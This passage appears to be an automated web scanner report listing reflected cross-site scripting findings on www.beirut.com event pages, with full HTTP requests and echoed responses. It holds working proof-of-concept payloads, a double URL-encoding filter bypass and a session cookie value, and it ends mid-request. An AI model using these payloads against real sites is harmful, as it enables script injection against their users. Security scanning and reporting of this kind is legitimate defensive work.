Path:	/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95a60%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57f053acbda was submitted in the REST URL parameter 4. This input was echoed as 95a60"><script>alert(1)</script>57f053acbda in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/604495a60%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e57f053acbda HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:37:08 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=604495a60"><script>alert(1)</script>57f053acbda&randstyle=magenta">
...[SNIP]...

4.1123. http://www.beirut.com/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acdf4%2527%253balert%25281%2529%252f%252f798aee3afea was submitted in the REST URL parameter 4. This input was echoed as acdf4';alert(1)//798aee3afea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Ghada-Ghanem-Singing-with-The-Lebanese-Philharmonic-Orchestra/6044acdf4%2527%253balert%25281%2529%252f%252f798aee3afea HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:38:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Index';
var initfacebox='';
var contactid='6044acdf4';alert(1)//798aee3afea';
var showfacebox='';
</script>
...[SNIP]...

4.1124. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f8ae%2527%253balert%25281%2529%252f%252f3e321c74abf was submitted in the REST URL parameter 4. This input was echoed as 7f8ae';alert(1)//3e321c74abf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/59957f8ae%2527%253balert%25281%2529%252f%252f3e321c74abf HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:31:37 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Index';
var initfacebox='';
var contactid='59957f8ae';alert(1)//3e321c74abf';
var showfacebox='';
</script>
...[SNIP]...

4.1125. http://www.beirut.com/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a155d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e708b90da5ae was submitted in the REST URL parameter 4. This input was echoed as a155d"><script>alert(1)</script>708b90da5ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Request

GET /ThingsToDo/Monot/Un-Mage-En-Ete-Laurent-Poitrenaux/5995a155d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e708b90da5ae HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.0 404 Not Found
Date: Tue, 25 Jan 2011 06:30:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a id="moreinfo" rel="facebox" href="/moreInfo.php?contactid=5995a155d"><script>alert(1)</script>708b90da5ae&randstyle=magenta">
...[SNIP]...

4.1126. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 416d1"><a>efbbf2edf38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo416d1"><a>efbbf2edf38/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:43:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo416d1"><a>efbbf2edf38/Parties&listingtype=events.php&Types=">
...[SNIP]...

4.1127. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f200c'-alert(1)-'f9ca2a5a0b0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDof200c'-alert(1)-'f9ca2a5a0b0/Parties/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:54:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64241

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='ThingsToDof200c'-alert(1)-'f9ca2a5a0b0/Parties';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1128. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9324b'-alert(1)-'3612c4b09db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Parties9324b'-alert(1)-'3612c4b09db/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:05:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='ThingsToDo/Parties9324b'-alert(1)-'3612c4b09db';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1129. http://www.beirut.com/ThingsToDo/Parties/1690334 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Parties/1690334

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52bc1"><a>82184636b63 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Parties52bc1"><a>82184636b63/1690334 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:58:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63087

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=green&indexpage=ThingsToDo/Parties52bc1"><a>82184636b63&listingtype=events.php&Types=6">
...[SNIP]...

4.1130. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33a87"><a>c5a6cc85e3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo33a87"><a>c5a6cc85e3c/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:42:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=magenta&indexpage=ThingsToDo33a87"><a>c5a6cc85e3c/Performances&listingtype=events.php&Types=">
...[SNIP]...

4.1131. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0d5b'-alert(1)-'7c878119254 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDoa0d5b'-alert(1)-'7c878119254/Performances/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:50:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 63817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='ThingsToDoa0d5b'-alert(1)-'7c878119254/Performances';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1132. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92494"><a>45b1a71f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ThingsToDo/Performances92494"><a>45b1a71f2/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 05:56:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<a id="submitlisting_right" rel="facebox" href="/submitaListing.php?randstyle=orange&indexpage=ThingsToDo/Performances92494"><a>45b1a71f2&listingtype=events.php&Types=17">
...[SNIP]...

4.1133. http://www.beirut.com/ThingsToDo/Performances/112730726 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Performances/112730726

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 659ba'-alert(1)-'5d6526146cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ThingsToDo/Performances659ba'-alert(1)-'5d6526146cc/112730726 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 06:04:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='ThingsToDo/Performances659ba'-alert(1)-'5d6526146cc';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1134. http://www.beirut.com/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 807bf%2527%253balert%25281%2529%252f%252f80b93cb571a was submitted in the REST URL parameter 4. This input was echoed as 807bf';alert(1)//80b93cb571a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /ThingsToDo/Quraitem/Letters-A-Play-Directed-by-Grace-Dunya/6081807bf%2527%253balert%25281%2529%252f%252f80b93cb571a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
